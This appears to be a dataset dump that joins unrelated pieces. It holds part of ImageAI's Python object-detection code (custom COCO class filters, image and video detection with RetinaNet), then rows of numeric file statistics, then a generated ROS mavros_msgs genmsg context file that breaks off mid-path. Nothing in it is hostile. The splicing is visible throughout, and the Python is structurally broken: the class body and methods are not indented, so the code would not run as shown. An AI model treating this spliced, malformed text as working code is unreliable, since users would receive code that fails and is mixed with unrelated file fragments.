                  oven=False, toaster=False, sink=False, refrigerator=False, book=False, clock=False, vase=False, scissors=False, teddy_bear=False, hair_dryer=False,
                  toothbrush=False):
    """
    Build the class-filter dictionary consumed by 'detectCustomObjectsFromImage()'.

    Set any keyword to True to mark that COCO class as wanted; every class is
    mapped to "valid" (detect) or "invalid" (skip) in the returned dict.
    Note: the parameter names 'donot' and 'hair_dryer' are kept for backward
    compatibility, but the dictionary keys are the corrected class names
    "donut" and "hair drier" so they match 'numbers_to_names' -- the previous
    mismatched keys made filtering those classes raise a KeyError.
    :param boolean_values: one keyword per COCO class, True/False
    :return: dict mapping each class name to "valid" or "invalid"
    """
    input_values = [person, bicycle, car, motorcycle, airplane,
                    bus, train, truck, boat, traffic_light, fire_hydrant, stop_sign,
                    parking_meter, bench, bird, cat, dog, horse, sheep, cow, elephant, bear, zebra,
                    giraffe, backpack, umbrella, handbag, tie, suitcase, frisbee, skis, snowboard,
                    sports_ball, kite, baseball_bat, baseball_glove, skateboard, surfboard, tennis_racket,
                    bottle, wine_glass, cup, fork, knife, spoon, bowl, banana, apple, sandwich, orange,
                    broccoli, carrot, hot_dog, pizza, donot, cake, chair, couch, potted_plant, bed,
                    dining_table, toilet, tv, laptop, mouse, remote, keyboard, cell_phone, microwave,
                    oven, toaster, sink, refrigerator, book, clock, vase, scissors, teddy_bear, hair_dryer,
                    toothbrush]
    # Keys corrected to agree with numbers_to_names: "donut" (was "donot")
    # and "hair drier" (was "hair_dryer").
    actual_labels = ["person", "bicycle", "car", "motorcycle", "airplane",
                     "bus", "train", "truck", "boat", "traffic_light", "fire_hydrant", "stop_sign",
                     "parking_meter", "bench", "bird", "cat", "dog", "horse", "sheep", "cow", "elephant", "bear", "zebra",
                     "giraffe", "backpack", "umbrella", "handbag", "tie", "suitcase", "frisbee", "skis", "snowboard",
                     "sports_ball", "kite", "baseball_bat", "baseball_glove", "skateboard", "surfboard", "tennis_racket",
                     "bottle", "wine glass", "cup", "fork", "knife", "spoon", "bowl", "banana", "apple", "sandwich", "orange",
                     "broccoli", "carrot", "hot dog", "pizza", "donut", "cake", "chair", "couch", "potted_plant", "bed",
                     "dining_table", "toilet", "tv", "laptop", "mouse", "remote", "keyboard", "cell_phone", "microwave",
                     "oven", "toaster", "sink", "refrigerator", "book", "clock", "vase", "scissors", "teddy bear", "hair drier",
                     "toothbrush"]
    return {label: ("valid" if flag else "invalid")
            for flag, label in zip(input_values, actual_labels)}
def detectCustomObjectsFromImage(self, custom_objects=None, input_image="", output_image_path="", input_type="file", output_type="file", extract_detected_objects = False, minimum_percentage_probability = 50):
    """
    Detect only the COCO classes selected via 'CustomObjects()' in a single image.

    Behaves exactly like detectObjectsFromImage(), except that detections whose
    class is marked "invalid" in custom_objects are skipped. A custom_objects
    of None disables filtering entirely.
    :param custom_objects: dict returned by CustomObjects(), or None for no filtering
    :param input_image: file path, numpy array or file stream of the image (interpreted per input_type)
    :param output_image_path: path for the annotated image (used only when output_type == "file")
    :param input_type: "file", "array" or "stream"
    :param output_type: "file" or "array"
    :param extract_detected_objects: if True, each detection is also cropped out individually
    :param minimum_percentage_probability: minimum confidence (in percent) for a detection to be kept
    :return: same shapes as detectObjectsFromImage(), depending on
        output_type / extract_detected_objects.
    :raises ValueError: if the model is not loaded, or if reading/processing the image fails.
    """
    if not self.__modelLoaded:
        raise ValueError("You must call the loadModel() function before making object detection.")
    try:
        output_objects_array = []
        detected_objects_image_array = []
        if input_type == "file":
            image = read_image_bgr(input_image)
        elif input_type == "array":
            image = read_image_array(input_image)
        elif input_type == "stream":
            image = read_image_stream(input_image)
        # Two RGB copies: one to draw annotations on, one pristine for crops.
        detected_copy = cv2.cvtColor(image.copy(), cv2.COLOR_BGR2RGB)
        detected_copy2 = cv2.cvtColor(image.copy(), cv2.COLOR_BGR2RGB)
        image = preprocess_image(image)
        image, scale = resize_image(image, min_side=self.__input_image_min, max_side=self.__input_image_max)
        model = self.__model_collection[0]
        _, _, detections = model.predict_on_batch(np.expand_dims(image, axis=0))
        predicted_numbers = np.argmax(detections[0, :, 4:], axis=1)
        scores = detections[0, np.arange(detections.shape[1]), 4 + predicted_numbers]
        # Map box coordinates back to the original (un-resized) image.
        detections[0, :, :4] /= scale
        min_probability = minimum_percentage_probability / 100
        # Hoisted out of the per-detection loop (was recomputed/re-checked each iteration).
        objects_dir = output_image_path + "-objects"
        if extract_detected_objects and output_type == "file" and not os.path.exists(objects_dir):
            os.mkdir(objects_dir)
        counting = 0
        for index, (label, score) in enumerate(zip(predicted_numbers, scores)):
            if score < min_probability:
                continue
            if custom_objects is not None:
                check_name = self.numbers_to_names[label]
                if custom_objects[check_name] == "invalid":
                    continue
            counting += 1
            color = label_color(label)
            detection_details = detections[0, index, :4].astype(int)
            draw_box(detected_copy, detection_details, color=color)
            caption = "{} {:.3f}".format(self.numbers_to_names[label], (score * 100))
            draw_caption(detected_copy, detection_details, caption)
            each_object_details = {}
            each_object_details["name"] = self.numbers_to_names[label]
            each_object_details["percentage_probability"] = str(score * 100)
            output_objects_array.append(each_object_details)
            if extract_detected_objects:
                # Crop from the pristine copy so annotations never leak into crops.
                splitted_copy = detected_copy2.copy()[detection_details[1]:detection_details[3],
                                detection_details[0]:detection_details[2]]
                if output_type == "file":
                    splitted_image_path = os.path.join(objects_dir, self.numbers_to_names[label] + "-" + str(
                        counting) + ".jpg")
                    pltimage.imsave(splitted_image_path, splitted_copy)
                    detected_objects_image_array.append(splitted_image_path)
                elif output_type == "array":
                    detected_objects_image_array.append(splitted_copy)
        if output_type == "file":
            pltimage.imsave(output_image_path, detected_copy)
        if extract_detected_objects:
            if output_type == "file":
                return output_objects_array, detected_objects_image_array
            elif output_type == "array":
                return detected_copy, output_objects_array, detected_objects_image_array
        else:
            if output_type == "file":
                return output_objects_array
            elif output_type == "array":
                return detected_copy, output_objects_array
    except Exception as e:
        # Narrowed from a bare `except:` and chained, so the underlying
        # traceback is preserved instead of being silently discarded.
        raise ValueError(
            "Ensure you specified correct input image, input type, output type and/or output image path ") from e
class VideoObjectDetection:
"""
*** THIS VERSION OF THE VideoObjectDetection CLASS IS A PREVIEW VERSION ***
This is the object detection class for videos in the ImageAI library. It provides support for RetinaNet
object detection network . After instantiating this class, you can set it's properties and
make object detections using it's pre-defined functions.
The following functions are required to be called before object detection can be made
* setModelPath()
* At least one of the following, and it must correspond to the model set in setModelPath()
[setModelTypeAsRetinaNet()]
* loadModel() [This must be called once only before performing object detection]
Once the above functions have been called, you can call the detectObjectsFromVideo() function of
the object detection instance object at anytime to obtain observable objects in any video.
"""
def __init__(self):
    """Initialize video-detection state; model type/path must be set before loadModel()."""
    self.__modelType = ""          # set via setModelTypeAsRetinaNet()
    self.modelPath = ""            # set via setModelPath()
    self.__modelPathAdded = False  # guards against overwriting the model path
    self.__modelLoaded = False     # True once loadModel() has run
    self.__model_collection = []   # holds the single loaded Keras model
    # Resize bounds passed to resize_image(); loadModel() overwrites them per
    # detection_speed. The original defaults were swapped (min=1333, max=800);
    # corrected here to match the "normal" speed profile in loadModel().
    self.__input_image_min = 800
    self.__input_image_max = 1333
    self.__detection_storage = None  # reserved; not used in this preview version
    # COCO class index -> human-readable class name.
    self.numbers_to_names = {0: 'person', 1: 'bicycle', 2: 'car', 3: 'motorcycle', 4: 'airplane', 5: 'bus', 6: 'train',
                             7: 'truck', 8: 'boat', 9: 'traffic_light', 10: 'fire_hydrant', 11: 'stop_sign', 12: 'parking_meter',
                             13: 'bench', 14: 'bird', 15: 'cat', 16: 'dog', 17: 'horse', 18: 'sheep', 19: 'cow', 20: 'elephant',
                             21: 'bear', 22: 'zebra', 23: 'giraffe', 24: 'backpack', 25: 'umbrella', 26: 'handbag', 27: 'tie',
                             28: 'suitcase', 29: 'frisbee', 30: 'skis', 31: 'snowboard', 32: 'sports_ball', 33: 'kite',
                             34: 'baseball_bat', 35: 'baseball_glove', 36: 'skateboard', 37: 'surfboard', 38: 'tennis_racket',
                             39: 'bottle', 40: 'wine glass', 41: 'cup', 42: 'fork', 43: 'knife', 44: 'spoon', 45: 'bowl',
                             46: 'banana', 47: 'apple', 48: 'sandwich', 49: 'orange', 50: 'broccoli', 51: 'carrot', 52: 'hot dog',
                             53: 'pizza', 54: 'donut', 55: 'cake', 56: 'chair', 57: 'couch', 58: 'potted_plant', 59: 'bed',
                             60: 'dining_table', 61: 'toilet', 62: 'tv', 63: 'laptop', 64: 'mouse', 65: 'remote', 66: 'keyboard',
                             67: 'cell_phone', 68: 'microwave', 69: 'oven', 70: 'toaster', 71: 'sink', 72: 'refrigerator',
                             73: 'book', 74: 'clock', 75: 'vase', 76: 'scissors', 77: 'teddy bear', 78: 'hair drier',
                             79: 'toothbrush'}
def setModelTypeAsRetinaNet(self):
    """
    Mark this video-detection instance as using the RetinaNet model.

    Must be called before loadModel().
    :return: None
    """
    self.__modelType = "retinanet"
def setModelPath(self, model_path):
    """
    Record the file path to the COCO-trained RetinaNet weights.

    Only the first call has an effect; later calls are silently ignored.
    :param model_path: path to the model weights file
    :return: None
    """
    if not self.__modelPathAdded:
        self.modelPath = model_path
        self.__modelPathAdded = True
def loadModel(self, detection_speed="normal"):
    """
    Build the RetinaNet model and load its weights from the configured path.

    The optional detection_speed selects an input-resize profile that trades
    detection count for speed. Unrecognized values leave the current resize
    bounds unchanged.
    :param detection_speed: one of "normal", "fast", "faster", "fastest", "flash"
    :return: None
    :raises ValueError: if no model type was set before loading
    """
    # (min_side, max_side) resize bounds per speed profile.
    speed_profiles = {
        "normal": (800, 1333),
        "fast": (400, 700),
        "faster": (300, 500),
        "fastest": (200, 350),
        "flash": (100, 250),
    }
    if detection_speed in speed_profiles:
        self.__input_image_min, self.__input_image_max = speed_profiles[detection_speed]
    if not self.__modelLoaded:
        if self.__modelType == "":
            raise ValueError("You must set a valid model type before loading the model.")
        elif self.__modelType == "retinanet":
            model = resnet50_retinanet(num_classes=80)
            model.load_weights(self.modelPath)
            self.__model_collection.append(model)
            self.__modelLoaded = True
def detectObjectsFromVideo(self, input_file_path="", output_file_path="", frames_per_second=20, frame_detection_interval=1, minimum_percentage_probability=50, log_progress=False):
    """
    Detect COCO objects frame-by-frame in a video and write an annotated copy.

    Frames are read with OpenCV; detection runs on frame 1 and then on every
    frame_detection_interval-th frame, reusing the last detections on the
    frames in between. The annotated video is saved as MJPG at
    output_file_path + ".avi".
    :param input_file_path: path to the input video file
    :param output_file_path: path (without extension) for the output video; ".avi" is appended
    :param frames_per_second: frame rate of the output video
    :param frame_detection_interval: run detection every N-th frame (1 = every frame)
    :param minimum_percentage_probability: minimum confidence (in percent) for a detection to be drawn
    :param log_progress: if True, print the index of each frame as it is processed
    :return: path of the written output video file
    :raises ValueError: if either path is empty, or if processing fails
    """
    if input_file_path == "" or output_file_path == "":
        raise ValueError("You must set 'input_file_path' to a valid video file, and the 'output_file_path' to path you want the detected video saved.")
    try:
        input_video = cv2.VideoCapture(input_file_path)
        output_video_filepath = output_file_path + '.avi'
        frame_width = int(input_video.get(3))   # CAP_PROP_FRAME_WIDTH
        frame_height = int(input_video.get(4))  # CAP_PROP_FRAME_HEIGHT
        output_video = cv2.VideoWriter(output_video_filepath, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), frames_per_second,
                                       (frame_width, frame_height))
        counting = 0
        predicted_numbers = None
        scores = None
        detections = None
        # Hoisted: loop-invariant threshold (was recomputed per frame).
        min_probability = minimum_percentage_probability / 100
        model = self.__model_collection[0]
        while input_video.isOpened():
            ret, frame = input_video.read()
            if not ret:
                break
            counting += 1
            if log_progress:
                print("Processing Frame : ", str(counting))
            detected_copy = frame.copy()
            # NOTE(review): the frame is converted BGR->RGB here but later
            # written to a cv2.VideoWriter, which expects BGR -- output colors
            # may be channel-swapped; preserved as-is, confirm before changing.
            detected_copy = cv2.cvtColor(detected_copy, cv2.COLOR_BGR2RGB)
            frame = preprocess_image(frame)
            frame, scale = resize_image(frame, min_side=self.__input_image_min, max_side=self.__input_image_max)
            if counting == 1 or counting % frame_detection_interval == 0:
                _, _, detections = model.predict_on_batch(np.expand_dims(frame, axis=0))
                predicted_numbers = np.argmax(detections[0, :, 4:], axis=1)
                scores = detections[0, np.arange(detections.shape[1]), 4 + predicted_numbers]
                # Map box coordinates back to the original frame size.
                detections[0, :, :4] /= scale
            for index, (label, score) in enumerate(zip(predicted_numbers, scores)):
                if score < min_probability:
                    continue
                color = label_color(label)
                detection_details = detections[0, index, :4].astype(int)
                draw_box(detected_copy, detection_details, color=color)
                caption = "{} {:.3f}".format(self.numbers_to_names[label], (score * 100))
                draw_caption(detected_copy, detection_details, caption)
            output_video.write(detected_copy)
        input_video.release()
        output_video.release()
        return output_video_filepath
    except Exception as e:
        # Narrowed from a bare `except:` and chained, so the underlying
        # traceback is preserved instead of being silently discarded.
        raise ValueError("An error occured. It may be that your input video is invalid.") from e
def CustomObjects(self, person=False, bicycle=False, car=False, motorcycle=False, airplane=False,
                  bus=False, train=False, truck=False, boat=False, traffic_light=False, fire_hydrant=False, stop_sign=False,
                  parking_meter=False, bench=False, bird=False, cat=False, dog=False, horse=False, sheep=False, cow=False, elephant=False, bear=False, zebra=False,
                  giraffe=False, backpack=False, umbrella=False, handbag=False, tie=False, suitcase=False, frisbee=False, skis=False, snowboard=False,
                  sports_ball=False, kite=False, baseball_bat=False, baseball_glove=False, skateboard=False, surfboard=False, tennis_racket=False,
                  bottle=False, wine_glass=False, cup=False, fork=False, knife=False, spoon=False, bowl=False, banana=False, apple=False, sandwich=False, orange=False,
                  broccoli=False, carrot=False, hot_dog=False, pizza=False, donot=False, cake=False, chair=False, couch=False, potted_plant=False, bed=False,
                  dining_table=False, toilet=False, tv=False, laptop=False, mouse=False, remote=False, keyboard=False, cell_phone=False, microwave=False,
                  oven=False, toaster=False, sink=False, refrigerator=False, book=False, clock=False, vase=False, scissors=False, teddy_bear=False, hair_dryer=False,
                  toothbrush=False):
    """
    Build the class-filter dictionary consumed by 'detectCustomObjectsFromVideo()'.

    Set any keyword to True to mark that COCO class as wanted; every class is
    mapped to "valid" (detect) or "invalid" (skip) in the returned dict.
    Note: the parameter names 'donot' and 'hair_dryer' are kept for backward
    compatibility, but the dictionary keys are the corrected class names
    "donut" and "hair drier" so they match 'numbers_to_names' -- the previous
    mismatched keys made filtering those classes raise a KeyError.
    :param boolean_values: one keyword per COCO class, True/False
    :return: dict mapping each class name to "valid" or "invalid"
    """
    input_values = [person, bicycle, car, motorcycle, airplane,
                    bus, train, truck, boat, traffic_light, fire_hydrant, stop_sign,
                    parking_meter, bench, bird, cat, dog, horse, sheep, cow, elephant, bear, zebra,
                    giraffe, backpack, umbrella, handbag, tie, suitcase, frisbee, skis, snowboard,
                    sports_ball, kite, baseball_bat, baseball_glove, skateboard, surfboard, tennis_racket,
                    bottle, wine_glass, cup, fork, knife, spoon, bowl, banana, apple, sandwich, orange,
                    broccoli, carrot, hot_dog, pizza, donot, cake, chair, couch, potted_plant, bed,
                    dining_table, toilet, tv, laptop, mouse, remote, keyboard, cell_phone, microwave,
                    oven, toaster, sink, refrigerator, book, clock, vase, scissors, teddy_bear, hair_dryer,
                    toothbrush]
    # Keys corrected to agree with numbers_to_names: "donut" (was "donot")
    # and "hair drier" (was "hair_dryer").
    actual_labels = ["person", "bicycle", "car", "motorcycle", "airplane",
                     "bus", "train", "truck", "boat", "traffic_light", "fire_hydrant", "stop_sign",
                     "parking_meter", "bench", "bird", "cat", "dog", "horse", "sheep", "cow", "elephant", "bear", "zebra",
                     "giraffe", "backpack", "umbrella", "handbag", "tie", "suitcase", "frisbee", "skis", "snowboard",
                     "sports_ball", "kite", "baseball_bat", "baseball_glove", "skateboard", "surfboard", "tennis_racket",
                     "bottle", "wine glass", "cup", "fork", "knife", "spoon", "bowl", "banana", "apple", "sandwich", "orange",
                     "broccoli", "carrot", "hot dog", "pizza", "donut", "cake", "chair", "couch", "potted_plant", "bed",
                     "dining_table", "toilet", "tv", "laptop", "mouse", "remote", "keyboard", "cell_phone", "microwave",
                     "oven", "toaster", "sink", "refrigerator", "book", "clock", "vase", "scissors", "teddy bear", "hair drier",
                     "toothbrush"]
    return {label: ("valid" if flag else "invalid")
            for flag, label in zip(input_values, actual_labels)}
def detectCustomObjectsFromVideo(self, custom_objects=None, input_file_path="", output_file_path="", frames_per_second=20, frame_detection_interval=1, minimum_percentage_probability=50, log_progress=False):
    """
    Detect only the object classes enabled in ``custom_objects`` in a video
    and save an annotated copy of it.

    * custom_objects , dictionary returned by the 'CustomObjects' function;
      classes mapped to "invalid" are skipped. ``None`` disables filtering.
    * input_file_path , file path to the input video.
    * output_file_path , path for the output video ('.avi' is appended).
    * frames_per_second , frame rate used for the output video.
    * frame_detection_interval (optional, 1 by default) , run detection on
      every N-th frame; frames in between re-use the latest detections.
    * minimum_percentage_probability (optional, 50 by default) , minimum
      score (percent) for a detection to be drawn.
    * log_progress (optional) , if True, log each processed frame index.

    :param custom_objects:
    :param input_file_path:
    :param output_file_path:
    :param frames_per_second:
    :param frame_detection_interval:
    :param minimum_percentage_probability:
    :param log_progress:
    :return output_video_filepath:
    :raises ValueError: if a path is missing or processing fails.
    """
    if input_file_path == "" or output_file_path == "":
        raise ValueError("You must set 'input_file_path' to a valid video file, and the 'output_file_path' to path you want the detected video saved.")
    try:
        input_video = cv2.VideoCapture(input_file_path)
        output_video_filepath = output_file_path + '.avi'
        # cv2 property ids 3 / 4 are CAP_PROP_FRAME_WIDTH / CAP_PROP_FRAME_HEIGHT.
        frame_width = int(input_video.get(3))
        frame_height = int(input_video.get(4))
        output_video = cv2.VideoWriter(output_video_filepath,
                                       cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'),
                                       frames_per_second,
                                       (frame_width, frame_height))
        counting = 0
        # Latest detection results; re-used for frames between detection intervals.
        predicted_numbers = None
        scores = None
        detections = None
        model = self.__model_collection[0]
        # Hoisted out of the loop: invariant across frames.
        min_probability = minimum_percentage_probability / 100
        while input_video.isOpened():
            ret, frame = input_video.read()
            if not ret:
                break
            counting += 1
            if log_progress:
                print("Processing Frame : ", str(counting))
            detected_copy = frame.copy()
            # NOTE(review): the copy is converted to RGB for drawing but then
            # written to a cv2 VideoWriter, which expects BGR — output colours
            # look channel-swapped; preserved as original behavior.
            detected_copy = cv2.cvtColor(detected_copy, cv2.COLOR_BGR2RGB)
            frame = preprocess_image(frame)
            frame, scale = resize_image(frame, min_side=self.__input_image_min, max_side=self.__input_image_max)
            # Only run the (expensive) model on the first frame and on every
            # frame_detection_interval-th frame thereafter.
            if counting == 1 or counting % frame_detection_interval == 0:
                _, _, detections = model.predict_on_batch(np.expand_dims(frame, axis=0))
                predicted_numbers = np.argmax(detections[0, :, 4:], axis=1)
                scores = detections[0, np.arange(detections.shape[1]), 4 + predicted_numbers]
                # Undo the resize scaling so boxes land on the original frame.
                detections[0, :, :4] /= scale
            for index, (label, score) in enumerate(zip(predicted_numbers, scores)):
                if score < min_probability:
                    continue
                if custom_objects is not None:
                    check_name = self.numbers_to_names[label]
                    if custom_objects[check_name] == "invalid":
                        continue
                color = label_color(label)
                detection_details = detections[0, index, :4].astype(int)
                draw_box(detected_copy, detection_details, color=color)
                caption = "{} {:.3f}".format(self.numbers_to_names[label], (score * 100))
                draw_caption(detected_copy, detection_details, caption)
            output_video.write(detected_copy)
        input_video.release()
        output_video.release()
        return output_video_filepath
    except Exception as e:
        # Chain the original error instead of silently discarding it
        # (the original bare 'except:' hid the real cause).
        raise ValueError("An error occured. It may be that your input video is invalid.") from e
| 54.45892
| 212
| 0.58012
| 5,038
| 46,399
| 5.142318
| 0.100437
| 0.017756
| 0.017833
| 0.010499
| 0.956382
| 0.95175
| 0.945768
| 0.94156
| 0.94156
| 0.94156
| 0
| 0.018386
| 0.333003
| 46,399
| 851
| 213
| 54.522914
| 0.818728
| 0.278993
| 0
| 0.940092
| 0
| 0.004608
| 0.112056
| 0.001451
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034562
| false
| 0
| 0.023041
| 0
| 0.092166
| 0.004608
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7e2d213e75bd248ac4c61f5cf2a0e2b28ed22ffc
| 8,593
|
py
|
Python
|
build/mavros_msgs/cmake/mavros_msgs-genmsg-context.py
|
arijitnoobstar/UAVProjectileCatcher
|
3c1bed80df167192cb4b971b58c891187628142e
|
[
"Apache-2.0"
] | 10
|
2021-03-15T03:58:06.000Z
|
2021-12-30T15:33:38.000Z
|
build/mavros_msgs/cmake/mavros_msgs-genmsg-context.py
|
arijitnoobstar/UAVProjectileCatcher
|
3c1bed80df167192cb4b971b58c891187628142e
|
[
"Apache-2.0"
] | 1
|
2021-09-09T15:29:31.000Z
|
2021-09-09T15:29:31.000Z
|
build/mavros_msgs/cmake/mavros_msgs-genmsg-context.py
|
arijitnoobstar/UAVProjectileCatcher
|
3c1bed80df167192cb4b971b58c891187628142e
|
[
"Apache-2.0"
] | 4
|
2021-03-06T09:35:58.000Z
|
2021-05-24T14:34:11.000Z
|
# generated from genmsg/cmake/pkg-genmsg.context.in
# Build-time context consumed by ROS genmsg code generation for the
# 'mavros_msgs' package. Machine-generated; values are plain assignments
# read by the generator scripts — do not edit by hand.

# Absolute paths of every .msg definition in the package, ';'-separated.
messages_str = "/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ADSBVehicle.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ActuatorControl.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Altitude.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/AttitudeTarget.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/BatteryStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/CamIMUStamp.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/CommandCode.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/CompanionProcessStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/OnboardComputerStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/DebugValue.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ESCInfo.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ESCInfoItem.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ESCStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ESCStatusItem.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/EstimatorStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ExtendedState.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/FileEntry.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/GlobalPositionTarget.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/GPSRAW.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/GPSRTK.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HilActuatorControls.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HilControls.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HilGPS.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HilSensor.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HilStateQuaternion.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HomePosition.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/LandingTarget.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/LogData.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/LogEntry.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ManualControl.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Mavlink.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/MountControl.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/OpticalFlowRad.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/OverrideRCIn.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Param.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ParamValue.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/PlayTuneV2.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/PositionTarget.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/RCIn.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/RCOut.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/RTCM.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/RadioStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/RTKBaseline.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/State.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/StatusText.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Thrust.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/TimesyncStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Trajectory.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/VFR_HUD.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/VehicleInfo.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Vibration.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Waypoint.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/WaypointList.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/WaypointReached.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/WheelOdomStamped.msg"
# Absolute paths of every .srv definition in the package, ';'-separated.
services_str = "/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandBool.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandHome.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandInt.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandLong.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandTOL.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandTriggerControl.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandTriggerInterval.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandVtolTransition.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileChecksum.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileClose.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileList.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileMakeDir.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileOpen.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileRead.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileRemove.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileRemoveDir.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileRename.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileTruncate.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileWrite.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/LogRequestData.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/LogRequestEnd.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/LogRequestList.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/MountConfigure.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/MessageInterval.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/ParamGet.srv;/home/arijitnoobstar/UAVProjectileC